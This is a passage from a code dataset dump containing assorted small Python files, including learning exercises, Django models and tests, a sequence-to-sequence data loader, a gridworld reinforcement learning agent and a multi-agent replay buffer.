len(library.list_of_books) - library.speed - 1:\n ind += library.speed\n else:\n break\n if len(library.books_to_scan) == len(library.list_of_books):\n break\n\n # print(library.list_of_books)\n # print(f\"Books to scan from {library.id}: {library.books_to_scan}\")\n write_file(file, list_of_signed_up)\n\n\nif __name__ == \"__main__\":\n tic = time.perf_counter()\n # process(file_names[0])\n for file in file_names:\n process(file)\n # process(\"e_so_many_books.txt\")\n toc = time.perf_counter()\n print(f\"Finished in {toc-tic}\")\n from test import main as test\n test(\"out2\")\n\n\n","sub_path":"books2.py","file_name":"books2.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"524742131","text":"\"\"\"\nPython makes performing file I/O simple. 
Take a look\nat how to read and write to files here:\n\nhttps://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files\n\"\"\"\n\n# Open up the \"foo.txt\" file (which already exists) for reading\n# Print all the contents of the file, then close the file\n# Note: pay close attention to your current directory when trying to open \"foo.txt\"\n\n# YOUR CODE HERE\nimport os.path\nmy_path = os.path.dirname(__file__)\nfoo_path = os.path.join(my_path, 'foo.txt')\n\nwith open(foo_path) as f:\n print('Contents of \\'foo.txt\\':')\n for line in f:\n print(' ' + line, end='')\n\nf.close()\n\n# Open up a file called \"bar.txt\" (which doesn't exist yet) for\n# writing. Write three lines of arbitrary content to that file,\n# then close the file. Open up \"bar.txt\" and inspect it to make\n# sure that it contains what you expect it to contain\n\n# YOUR CODE HERE\narbitrary_text = '''A shrubbery!.\nWe are the Knights Who Say \"Ni!\"\nDeath awaits you all with nasty, big, pointy teeth.'''\n\nbar_path = os.path.join(my_path, 'bar.txt')\n\n# Create (or overrite existing) file and write arbitrary text\nwith open(bar_path, 'w') as f:\n f.write(arbitrary_text)\n\nf.close()\n\n# Open newly created file and print its contents\nwith open(bar_path) as f:\n print('\\nContents of \\'bar.txt\\':')\n for line in f:\n print(' ' + line, end='')\n\nf.close()","sub_path":"src/13_file_io.py","file_name":"13_file_io.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"539486927","text":"# Given two .txt files that have lists of numbers in them, find the numbers that are overlapping. One .txt file has a list of all prime numbers under 1000, and the other .txt file has a list of happy numbers up to 1000.\n\nlist1 = []\nlist2 = []\nwith open(\"primenumbers.txt\", \"r\") as fin:\n\tfor num in fin.read().split(\"\\n\"):\n\t\tlist1.append( int(num) )\nwith open(\"happynumbers.txt\", \"r\") as fin:\n\tfor num in fin.read().split(\"\\n\"):\n\t\tlist2.append( int(num) )\n\t\t\t\nlist3 = [item for item in list1 if item in list2]\nprint( \"found \" + str(len(list3)) + \" overlaps\" )\nprint( list3 )\n\nprint([ int(line) for line in open('happynumbers.txt','r') for sec in open('primenumbers.txt','r') if int(line) == int(sec) ])","sub_path":"pythonFun/A23_FileOverlap.py","file_name":"A23_FileOverlap.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"636665136","text":"import sqlite3\n\nconn = sqlite3.connect('satnight.db')\nc = conn.cursor()\n\nc.execute(\n '''\n CREATE TABLE IF NOT EXISTS beers (\n id INTEGER PRIMARY KEY,\n brand TEXT,\n description TEXT,\n drinkable INTEGER\n )\n '''\n)\n\nstarter_beers = [\n (1, 'guinness', 'thick and delicious', True),\n (2, 'modelo', 'its modelo time', True),\n (3, 'coors', 'dads favorite', False),\n]\n\nc.executemany('''INSERT INTO beers VALUES (?, ?, ?, ?)''', starter_beers)\n\nconn.commit()\nconn.close()\n","sub_path":"api/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196542897","text":"# Reverse Sierpinski triangle\n# Triangles are equilateral, so triangle height (h) is:\n# a * sqr(0,75), or a * 0,866\n\nfrom tkinter import *\n\nroot = Tk()\nw = 667\nh = 0.866\ncanvas = Canvas(root, width=w, height=w*h, bg=\"black\")\ncanvas.pack()\n\ndef 
draw_eq_triangle(x, y, a, line_color):\n\n topleft = x, y\n topright = x + a, y\n bottom = x + (1/2 * a), y + (a * h)\n\n canvas.create_polygon(topleft, topright, bottom, fill='black', outline=line_color)\n\ndef reverse_sierpinski(x, y, a, fractal_color, depth):\n draw_eq_triangle(x, y, a, fractal_color)\n if a > depth:\n reverse_sierpinski(x, y, a/2, fractal_color, depth)\n reverse_sierpinski(x + a/2, y, a/2, fractal_color, depth)\n reverse_sierpinski(x + a/4, y + a/2 * h, a/2, fractal_color, depth)\n #reverse_sierpinski(x + a*(3/8), y + (a/4 * h), a/4, fractal_color, depth)\n\n# animation and coloring\nscale = 1\ncolor = 100\nfractal_w = 100\n\nfor i in range(1, 3000):\n fractal_w += 50\n if fractal_w > 2*w:\n fractal_w = w\n canvas.update()\n\n color += 20\n if scale == 6:\n scale = 1\n if color >= 256:\n color = 100\n scale += 1\n\n if scale == 1:\n col_r = color\n col_g = 0\n col_b = 0\n if scale == 2:\n col_r = 255\n col_g = color\n col_b = 0\n if scale == 3:\n col_r = 0\n col_g = color\n col_b = 0\n if scale == 4:\n col_r = 0\n col_g = 255\n col_b = color\n if scale == 5:\n col_r = 0\n col_g = 0\n col_b = color\n\n level_color = '#%02x%02x%02x' % (col_r, col_g, col_b)\n\n reverse_sierpinski(0, 0, fractal_w, level_color, 5)\n # print(fractal_w)\n canvas.update()\n\nroot.mainloop()\n","sub_path":"week-04/day-5/reverse_sierpinski_endless_colors.py","file_name":"reverse_sierpinski_endless_colors.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"221842981","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n# Import django modules\nfrom django.contrib.gis.db import models\nfrom django.contrib.postgres.fields import ArrayField\n\n#note, this code was developed initially using a tutorial. the objects field within a model allows special spatial functions to be used. 
Not used for now but could be powerful in the future\n\nclass Waypoint(models.Model):\n \n name = models.CharField(max_length=32)\n geometry = models.PointField(srid=4326)\n objects = models.GeoManager()\n date = models.DateTimeField()\n\n def __unicode__(self):\n return '%s at %s %s on %s' % (self.name, self.geometry.x, self.geometry.y,self.date.strftime(\"%Y-%m-%d %H:%M:%S\"))\n# Create your models here.\n\nclass Dataset(models.Model):\n name = models.CharField(max_length=32)\n points = ArrayField(ArrayField(models.FloatField()))\n dates = ArrayField(models.DateTimeField())\n objects = models.GeoManager()\n\nclass ClusterResult(models.Model):\n clusteringType = models.CharField(max_length=32)\n uniqueLabels = ArrayField(models.IntegerField())\n labels = ArrayField(models.IntegerField())\n date = models.DateTimeField()\n dataset = models.ForeignKey(Dataset, on_delete=models.CASCADE)\n","sub_path":"webApp/viewMap/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"351837757","text":"import pickle\nimport os\nimport random\nimport numpy as np\nimport copy\nimport nltk\n\n\ndef build_vocab(filenames, word=True):\n \"\"\"\n Build vocabulary from a list of files\n\n ----------\n @params\n filenames: list of string, input filenames\n\n @return\n vocab: dict, pairs of char tokens and their indices\n idx2char: list, mapping index to character\n\n For word == True, return source and target languages separately\n ----------\n \"\"\"\n # NOTE: the special-token names below were lost to markup stripping;\n # they are reconstructed from how indices 0-3 are used in this file\n # (0 = padding, 1 = start, 2 = end, 3 = unknown)\n vocab = {\n \"<pad>\" : 0,\n \"<s>\" : 1,\n \"</s>\" : 2, \n \"<unk>\" : 3,\n }\n idx2char = [\"<pad>\", \"<s>\", \"</s>\", \"<unk>\"]\n\n if word:\n thres = 5\n src_wc = {}\n tar_wc = {}\n\n for filename in filenames:\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n source, target = line.strip().split(\"<sep>\") # original separator tag was stripped; \"<sep>\" is an assumed placeholder\n source = source[:-5].strip().lower() # drops a trailing 5-char tag that was also stripped\n target = target[:-5].strip().lower()\n\n if word:\n for w in nltk.word_tokenize(source):\n src_wc[w] = src_wc.get(w, 0) + 1\n\n for w in nltk.word_tokenize(target):\n tar_wc[w] = tar_wc.get(w, 0) + 1\n\n else:\n for c in source + target:\n if c not in vocab:\n vocab[c] = len(vocab)\n idx2char.append(c)\n\n if word:\n\n def _trim(wc, min_count):\n trimmed_vocab = copy.deepcopy(vocab)\n trimmed_idx2token = copy.deepcopy(idx2char)\n\n for w, c in wc.items():\n if c >= min_count:\n trimmed_vocab[w] = len(trimmed_vocab)\n trimmed_idx2token.append(w)\n\n return trimmed_vocab, trimmed_idx2token\n\n src_vocab, src_idx2token = _trim(src_wc, thres)\n tar_vocab, tar_idx2token = _trim(tar_wc, thres)\n\n return src_vocab, src_idx2token, tar_vocab, tar_idx2token\n\n return vocab, idx2char\n\n\ndef load_data(file_path, vocab, pickle_path, max_len, reverse_source):\n \"\"\"\n Load source and target language sequences, each list contains a list of \n character indices converted from vocabulary\n\n ----------\n @params\n file_path: string, input file path\n vocab: dict, the vocabulary generated from a large corpus\n pickle_path: string, the location of the pickled data\n max_len: int, the maximum source sequence length, used to filter longer \n sequences\n reverse_source: bool, reverse the source sentence order, which may \n improve the final performance of machine translation\n\n @return\n source_seqs: list, a list of source language sentence\n target_seqs: list, a list of target language sentence\n ----------\n \"\"\"\n\n def reverse_order(seq):\n for i in range(len(seq)):\n seq[i] = list(reversed(seq[i]))\n return 
seq\n\n def sort_seq(src_seq, tar_seq):\n # sort data by descending length order\n src_seq = np.array(src_seq)\n tar_seq = np.array(tar_seq)\n\n src_lens = [len(s) for s in src_seq]\n order = np.argsort(src_lens)[::-1]\n\n return src_seq[order], tar_seq[order]\n\n if type(vocab) == list:\n pickle_path = pickle_path[:-2] + \"_word.p\"\n if os.path.exists(pickle_path.format(\"source\")):\n source_seqs = pickle.load(open(pickle_path.format(\"source\"), \"rb\"))\n target_seqs = pickle.load(open(pickle_path.format(\"target\"), \"rb\"))\n\n if reverse_source:\n source_seqs = reverse_order(source_seqs)\n \n return sort_seq(source_seqs, target_seqs)\n\n source_seqs = []\n target_seqs = []\n i = 0\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n source_seq = [1] # index 1 is the start-of-sequence token\n target_seq = [1]\n\n source, target = line.strip().split(\"<sep>\") # \"<sep>\" assumed, see build_vocab\n source = source[:-5].strip().lower()\n target = target[:-5].strip().lower()\n\n if len(source) <= max_len and len(source) >= max_len // 2:\n\n if type(vocab) == list:\n for w in nltk.word_tokenize(source):\n source_seq.append(vocab[0].get(w, vocab[0][\"<unk>\"]))\n source_seq.append(vocab[0][\"</s>\"])\n\n for w in nltk.word_tokenize(target):\n target_seq.append(vocab[1].get(w, vocab[1][\"<unk>\"]))\n target_seq.append(vocab[1][\"</s>\"])\n \n source_seqs.append(source_seq)\n target_seqs.append(target_seq)\n \n else:\n for c in source:\n source_seq.append(vocab[c])\n source_seq.append(vocab[\"</s>\"])\n \n for c in target:\n target_seq.append(vocab[c])\n target_seq.append(vocab[\"</s>\"])\n\n source_seqs.append(source_seq)\n target_seqs.append(target_seq)\n\n pickle.dump(source_seqs, open(pickle_path.format(\"source\"), \"wb\"))\n pickle.dump(target_seqs, open(pickle_path.format(\"target\"), \"wb\"))\n\n if reverse_source:\n source_seqs = reverse_order(source_seqs)\n\n return sort_seq(source_seqs, target_seqs)\n\n\ndef batchify(data, label, stride, batch_size=None, shuffle=False):\n \n if not batch_size:\n batch_size = len(data)\n\n data = np.array(data)\n label = np.array(label)\n\n data_size = len(data)\n order = list(range(data_size))\n if shuffle:\n random.shuffle(order)\n\n num_batches = int(np.ceil(1.*data_size / batch_size))\n \n for i in range(num_batches):\n \n start = i * batch_size\n indices = order[start: start+batch_size]\n\n padded_data, src_len, idx = pad_data(data[indices], stride)\n padded_label, label_mask = pad_label(label[indices][idx])\n \n yield padded_data, src_len, padded_label, label_mask\n \n\ndef pad_data(batch_data, stride):\n \"\"\"\n For source sequence data in a batch, \n zero-pad the short ones up to the multiples of stride, \n and sort in descending order by sequence length\n \n ----------\n @param \n batch_data: numpy array, has dimension (batch_size, seq_len)\n stride: int, stride size\n \n @return \n padded_data: numpy array, same format as batch_data, but padded\n seq_len: numpy array, the lengths of each sequence\n order: numpy array, the indices of items sorted in descending order\n ----------\n \"\"\"\n lens = [len(data) for data in batch_data]\n max_len = max(lens)\n if max_len % stride != 0:\n max_len += stride - (max_len % stride)\n\n batch_size = len(batch_data)\n n_tokens = len(batch_data[0])\n padded_data = np.zeros([batch_size, max_len], dtype=np.int32)\n seq_len = []\n \n for i in range(batch_size):\n length = len(batch_data[i])\n pad = np.pad(batch_data[i], (0, max_len-length), \"constant\")\n padded_data[i] = pad\n seq_len.append(length)\n\n order = np.flip(np.argsort(seq_len), 0) # sort in descending order\n\n return 
padded_data[order], np.array(seq_len)[order], order\n \n\ndef pad_label(batch_label):\n \"\"\"\n For target sequence data in a batch, \n zero-pad the short ones up to the max. length in the batch\n \n ----------\n @param \n batch_label: numpy array, has dimension (batch_size, seq_len)\n \n @return \n padded_label: numpy array, same format as batch_label, but padded\n label_mask: numpy array, the padded entries and the first entry \n are zeros.\n ----------\n \"\"\"\n lens = [len(data) for data in batch_label]\n max_len = max(lens)\n\n batch_size = len(batch_label)\n n_tokens = len(batch_label[0])\n padded_label = np.zeros([batch_size, max_len], dtype=np.int32)\n label_mask = np.zeros([batch_size, max_len])\n \n for i in range(batch_size):\n length = len(batch_label[i])\n pad = np.pad(batch_label[i], (0, max_len-length), \"constant\")\n padded_label[i] = pad\n label_mask[i,1:length] = 1\n\n return padded_label, label_mask\n\n\ndef convert2sequence(seq, idx2char, delimit=\" \"):\n output = []\n for i in seq:\n output.append(idx2char[i])\n if i == 2:\n break\n\n return delimit.join(output)\n\n\ndef loss_in_batch(output, label, mask, loss_fn):\n loss = 0\n for i in range(len(output)):\n loss += loss_fn(output[i:i+1], label[i:i+1]) * mask[i]\n return loss\n","sub_path":"CNN-ResNet-BiGRU/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"652206530","text":"import unittest\nimport requests\n\n\nclass TestBooks(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://pulse-rest-testing.herokuapp.com'\n self.part_url = '/books'\n self.book_id = None\n\n def test_book_create(self):\n book_data = {\"title\": \"Mu-Mu\", \"author\": \"Ivan Turgenev\"}\n res = requests.post(self.base_url + self.part_url, data=book_data)\n self.assertEqual(201, res.status_code)\n body = res.json()\n self.book_id = body['id']\n book_data['id'] = self.book_id\n self.assertEqual(body, book_data)\n\n def tearDown(self):\n if self.book_id is not None:\n requests.delete(f'{self.base_url}{self.part_url}/{self.book_id}')\n","sub_path":"test_book.py","file_name":"test_book.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502416241","text":"#!env/bin/python\nfrom melonhub import db, bcrypt\nfrom melonhub.models import Product, Stock\nfrom datetime import datetime\n\nprint(\"==========\")\nprint(\"This script adds a product\")\nprint(\"==========\")\n\nproduct_choices = [\"Medical Melon\", \"Magical Melon\", \"Musical Melon\", \"Aqua Melon\", \"Master Melon\", \"Make-A-Melon\"]\nchoice = product_choices[int(input(\"Which product do you want to add? 
[0] Medical Melon, [1] Magical Melon, [2] Musical Melon, [3] Aqua Melon, [4] Master Melon, [5] Make-a-Melon: \"))]\n\nproduct = Product.query.filter_by(name=choice).first()\n\namount = int(input(\"How many {}s do you want to create: \".format(choice)))\n\nstock_id = int(input(\"To which stock do you want to add {} {}s: \".format(str(amount), choice)))\n\n# Retrieve stock corresponding to the given stock id\n# this stock is passed to the product.stock variable\nstock = Stock.query.get(stock_id)\n\nfor i in range(amount):\n\tp = Product()\n\tp.name = product.name\n\tp.desc_short = product.desc_short\n\tp.desc_long = product.desc_long\n\tp.price_in_cents = product.price_in_cents\n\tp.costs_in_cents = product.costs_in_cents\n\tp.date_of_prod = product.date_of_prod\n\tp.date_of_expiration = product.date_of_expiration\n\tp.weight_in_grams = product.weight_in_grams\n\tp.length_in_mm = product.length_in_mm\n\tp.width_in_mm = product.width_in_mm\n\tp.height_in_mm = product.height_in_mm\n\tp.percentage_water = product.percentage_water\n\tp.percentage_sugar = product.percentage_sugar\n\tp.energy_in_kj_per_100_grams = product.energy_in_kj_per_100_grams\n\tp.mg_vitamin_c = product.mg_vitamin_c\n\tp.stock = stock\n\n\tdb.session.add(p)\n\tdb.session.commit()\n","sub_path":"add_product.py","file_name":"add_product.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495577801","text":"# python solve.py n10stg.csv N\n# read the strategy. and solve the optimality of the strategy instead of running simuations.\nfrom __future__ import print_function\nimport sys\nimport os\nimport string\nimport time\nimport random\nimport numpy\nfrom numpy import genfromtxt\nimport math\nimport json\nimport sim\nimport scipy.sparse\nimport scipy\nimport scipy.sparse.linalg\n\nP = 0.37\n\ndef solveSparseStrategy(stg,N):\n\teqns = scipy.sparse.lil_matrix( ( N+1 , N+1 ) )\n\tb = numpy.zeros( N+1 )\n\teqns[0,0] = 1.0\n\teqns[N,N] = 1.0\n\tb[0] = 0\n\tb[N] = 1\n\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\tX = i+1\n\t\tB = stg[X]\n\t\teqns[X,X - B] = 1.0 - P\n\t\teqns[X,X + B] = P\n\t\teqns[X,X] = -1.0\n\teqns = eqns.tocsr() # for efficiency\n\tx = scipy.sparse.linalg.spsolve(eqns, b)\n\treturn x\n\ndef solveStrategy(stg,N):\n\teqns = numpy.zeros( ( N+1 , N+1 ) )\n\tb = numpy.zeros( N+1 )\n\teqns[0][0] = 1.0\n\teqns[N][N] = 1.0\n\tb[0] = 0\n\tb[N] = 1\n\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\tX = i+1\n\t\tB = stg[X]\n\t\teqns[X][X - B] = 1.0 - P\n\t\teqns[X][X + B] = P\n\t\teqns[X][X] = -1.0\n\tx = numpy.linalg.solve(eqns, b)\n\treturn x\n\ndef output(stg,q0,N,csv_file):\n\twith open(csv_file, 'w') as the_file:\n\t\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\t\tX = i+1\n\t\t\t#stg[X] = [stg[X],q0[i]]\n\t\t\tprint(\"%u,%u,%.9f\"%(X,stg[X],q0[i]), file=the_file)\n\n\n\nif __name__ == \"__main__\":\n\tN = int(sys.argv[2])\n\tstg = sim.readStrategy(sys.argv[1],N)\n\n\tif N > 1000:\n\t\tq_vect = solveSparseStrategy(stg,N)\n\telse:\n\t\tq_vect = solveStrategy(stg,N)\n\tq0 = list(q_vect)\n\tq0 = q0[1:]\n\tq0 = q0[:-1]\n\toutput(stg,q0,N,sys.argv[1])\n\t#print q0\n\t#print \"Qs: %.9f\"%((sum(q_vect)-1.0)/(N-1))","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"219109157","text":"import random\r\nimport time\r\nfrom matplotlib import pyplot as 
plt\r\n\r\n\r\nclass Env:\r\n def __init__(self):\r\n self.wind = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0]\r\n\r\n def action_result(self, initial_location, action_taken):\r\n row, col = initial_location\r\n row = row - self.wind[col]\r\n if action_taken == 0:\r\n row -= 1\r\n elif action_taken == 1:\r\n col -= 1\r\n elif action_taken == 2:\r\n row += 1\r\n elif action_taken == 3:\r\n col += 1\r\n elif action_taken == 4:\r\n col += 1\r\n row -= 1\r\n elif action_taken == 5:\r\n col -= 1\r\n row -= 1\r\n elif action_taken == 6:\r\n col -= 1\r\n row += 1\r\n elif action_taken == 7:\r\n col += 1\r\n row += 1\r\n if row < 0:\r\n row = 0\r\n elif row > 6:\r\n row = 6\r\n if col < 0:\r\n col = 0\r\n elif col > 9:\r\n col = 9\r\n final_location = [row, col]\r\n return final_location\r\n\r\n\r\nclass State:\r\n def __init__(self, row, col):\r\n self.values = [0]*8\r\n self.coordinates = [row, col]\r\n\r\n\r\nclass Agent:\r\n def __init__(self):\r\n self.model = Env()\r\n self.row = 3\r\n self.col = 0\r\n self.episode_complete = False\r\n self.states = []\r\n the_row = []\r\n for i in range(7):\r\n for j in range(10):\r\n the_row.append(State(i, j))\r\n self.states.append(the_row)\r\n the_row = []\r\n self.current_state = self.states[self.row][self.col]\r\n self.next_state = self.states[self.row][self.col]\r\n\r\n def episode(self, step_size, gamma, display_actions):\r\n action_taken = 0\r\n while not self.episode_complete:\r\n if self.col == 7 and self.row == 3:\r\n self.episode_complete = True\r\n self.row = 3\r\n self.col = 0\r\n self.current_state = self.states[self.row][self.col]\r\n self.next_state = self.states[self.row][self.col]\r\n else:\r\n epsilon = 0.1\r\n if random.random() <= epsilon:\r\n action_taken = random.randint(0, 7)\r\n else:\r\n action_taken = self.current_state.values.index(max(self.current_state.values))\r\n\r\n if display_actions:\r\n # print(self.current_state.coordinates,self.next_state.coordinates)\r\n x_change = int(self.next_state.coordinates[1] - self.current_state.coordinates[1])\r\n if x_change < 0:\r\n file.write(\"W \")\r\n elif x_change > 0:\r\n file.write(\"E \")\r\n y_change = int(self.next_state.coordinates[0] - self.current_state.coordinates[0])\r\n if y_change < 0:\r\n for change in range(-y_change):\r\n file.write(\"N \")\r\n elif y_change > 0:\r\n for change in range(y_change):\r\n file.write(\"S \")\r\n\r\n final_loc = self.model.action_result([self.row, self.col], action_taken)\r\n self.row = final_loc[0]\r\n self.col = final_loc[1]\r\n self.next_state = self.states[self.row][self.col]\r\n\r\n q1 = epsilon * sum(self.current_state.values)/8 + (1 - epsilon) * max(self.current_state.values)\r\n q2 = gamma * (epsilon * sum(self.next_state.values)/8 + (1 - epsilon) * max(self.next_state.values))\r\n self.current_state.values[action_taken] += step_size * (-1 + q2 - q1)\r\n self.current_state = self.states[self.row][self.col]\r\n\r\n self.episode_complete = False\r\n\r\nfile = open(r\"King's Windy Solution.txt\", \"w\")\r\nagent = Agent()\r\nstep_size = 0.5\r\nstart_time = time.time()\r\ntimes = []\r\nfor i in range(150):\r\n times.append(500000 * (time.time() - start_time))\r\n agent.episode(0.5, 1, False)\r\nagent.episode(0.5, 1, True)\r\n\r\nepisodes = list(range(0, 150, 1))\r\nplt.xlabel(\"Time Steps\")\r\nplt.ylabel(\"Episodes\")\r\nplt.plot(times, episodes)\r\nplt.savefig(\"King's Windy World.png\", dpi=300, bbox_inches='tight')\r\n","sub_path":"Windy Gridworld/King's Windy 
World/KingWindyWorld.py","file_name":"KingWindyWorld.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254882104","text":"from django.core.exceptions import ValidationError\n\nfrom tender.forms.forms import TenderModelForm\nfrom tender.tests.test_tender import TenderCoreTests\n\n\nclass TenderFormTests(TenderCoreTests):\n\n def test_form_valid_with_order(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n\n def test_form_validation_fails_with_order_not_exists(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n order.delete()\n form = TenderModelForm(self.data)\n self.assertFalse(form.is_valid())\n self.assertRaisesMessage(ValidationError, expected_message='درخواستی با این شماره یافت نشد!')\n\n def test_form_valid_without_order(self):\n self.data['owner'] = self.user.pk\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n\n def test_save_form(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n tender = form.save()\n self.assertEqual(tender.order, order)\n","sub_path":"app/tender/tests/test_form.py","file_name":"test_form.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"199978547","text":"import numpy as np\nfrom torch import Tensor\nfrom torch.autograd import Variable\n\n\nclass ReplayBuffer(object):\n \"\"\"\n Replay Buffer for multi-agent RL with parallel rollouts\n \"\"\"\n\n def __init__(self,\n max_steps,\n num_agents,\n obs_dims,\n ac_dims):\n \"\"\"\n Inputs:\n max_steps (int): Maximum number of timepoints to store in buffer\n num_agents (int): Number of agents in environment\n obs_dims (list of ints): number of obervation dimensions for each\n agent\n ac_dims (list of ints): number of action dimensions for each agent\n \"\"\"\n self.max_steps = max_steps\n self.num_agents = num_agents\n obs_dims = obs_dims\n ac_dims = ac_dims\n\n # self.num_agents = num_agents\n self.obs_buffs = []\n self.ac_buffs = []\n self.rew_buffs = []\n self.next_obs_buffs = []\n self.done_buffs = []\n for odim, adim in zip(obs_dims, ac_dims):\n self.obs_buffs.append(np.zeros((max_steps, odim),\n dtype=np.float32))\n self.ac_buffs.append(np.zeros((max_steps, adim), dtype=np.float32))\n self.rew_buffs.append(np.zeros(max_steps, dtype=np.float32))\n self.next_obs_buffs.append(\n np.zeros((max_steps, odim), dtype=np.float32))\n self.done_buffs.append(np.zeros(max_steps, dtype=np.uint8))\n\n # index of first empty location in buffer (last index when full)\n self.filled_i = 0\n self.curr_i = 0 # current index to write to (ovewrite oldest data)\n\n return\n\n def __len__(self):\n return self.filled_i\n\n def push(self,\n observations,\n actions,\n rewards,\n next_observations,\n dones,\n accumulate=True,\n gamma=0.95):\n\n # nentries = observations.shape[1] \n nentries = 16\n\n if self.curr_i + nentries > self.max_steps:\n # num of indices to roll over\n rollover = self.max_steps - self.curr_i\n for agent_i in range(self.num_agents):\n self.obs_buffs[agent_i] = np.roll(self.obs_buffs[agent_i],\n 
rollover,\n axis=0)\n self.ac_buffs[agent_i] = np.roll(self.ac_buffs[agent_i],\n rollover,\n axis=0)\n self.rew_buffs[agent_i] = np.roll(self.rew_buffs[agent_i],\n rollover)\n self.next_obs_buffs[agent_i] = np.roll(\n self.next_obs_buffs[agent_i], rollover, axis=0)\n self.done_buffs[agent_i] = np.roll(self.done_buffs[agent_i],\n rollover)\n self.curr_i = 0\n self.filled_i = self.max_steps\n\n for agent_i in range(self.num_agents):\n # print(observations[agent_i].shape)\n self.obs_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = observations[agent_i]\n # actions are already batched by agent, so they are indexed differently\n self.ac_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = actions[agent_i]\n self.rew_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = rewards[agent_i]\n self.next_obs_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = next_observations[agent_i]\n self.done_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = dones[agent_i]\n\n self.curr_i += nentries\n if self.filled_i < self.max_steps:\n self.filled_i += nentries\n if self.curr_i == self.max_steps:\n self.curr_i = 0\n\n if accumulate:\n done_thread = np.argwhere(dones[0]).flatten()\n if len(done_thread) > 0:\n # print(done_thread)\n pass\n for thread in done_thread:\n accum_rwd, thd = np.zeros(self.num_agents), 16 - thread\n tmp = self.curr_i - thd - nentries\n accum_rwd += ([\n self.rew_buffs[i][self.curr_i - thd]\n for i in range(self.num_agents)\n ])\n\n while True:\n # print(tmp)\n # print(accum_rwd)\n accum_rwd = np.array([\n self.rew_buffs[i][tmp] for i in range(self.num_agents)\n ]) + accum_rwd * gamma\n for agent_i in range(self.num_agents):\n self.rew_buffs[agent_i][tmp] = accum_rwd[agent_i]\n tmp -= nentries\n if self.done_buffs[0][tmp]:\n break\n if tmp < 0 and self.filled_i == self.max_steps:\n tmp += self.max_steps\n # print(tmp)\n # print(nentries)\n # print(self.rew_buffs[0][tmp + np.arange(150) * nentries])\n return\n\n def sample(self, N, device='cpu', norm_rews=True):\n inds = np.random.choice(np.arange(self.filled_i), size=N, replace=True)\n # if to_gpu:\n # cast = lambda x: Variable(Tensor(x), requires_grad=False).cuda()\n # else:\n cast = lambda x: Variable(Tensor(x), requires_grad=False).to(device)\n if norm_rews:\n ret_rews = [\n cast((self.rew_buffs[i][inds] -\n self.rew_buffs[i][:self.filled_i].mean()) /\n (self.rew_buffs[i][:self.filled_i].std() + 1e-7))\n for i in range(self.num_agents)\n ]\n else:\n ret_rews = [\n cast(self.rew_buffs[i][inds]) for i in range(self.num_agents)\n ]\n\n obs_buffs = [\n cast(self.obs_buffs[i][inds]) for i in range(self.num_agents)\n ]\n ac_buffs = [\n cast(self.ac_buffs[i][inds]) for i in range(self.num_agents)\n ]\n next_obs_buffs = [\n cast(self.next_obs_buffs[i][inds]) for i in range(self.num_agents)\n ]\n done_buffs = [\n cast(self.done_buffs[i][inds]) for i in range(self.num_agents)\n ]\n\n return (obs_buffs, ac_buffs, ret_rews, next_obs_buffs, done_buffs)\n\n def get_average_rewards(self, N):\n if self.filled_i == self.max_steps:\n inds = np.arange(self.curr_i - N,\n self.curr_i) # allow for negative indexing\n else:\n inds = np.arange(max(0, self.curr_i - N), self.curr_i)\n return [self.rew_buffs[i][inds].mean() for i in range(self.num_agents)]\n","sub_path":"maac_team/utils/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 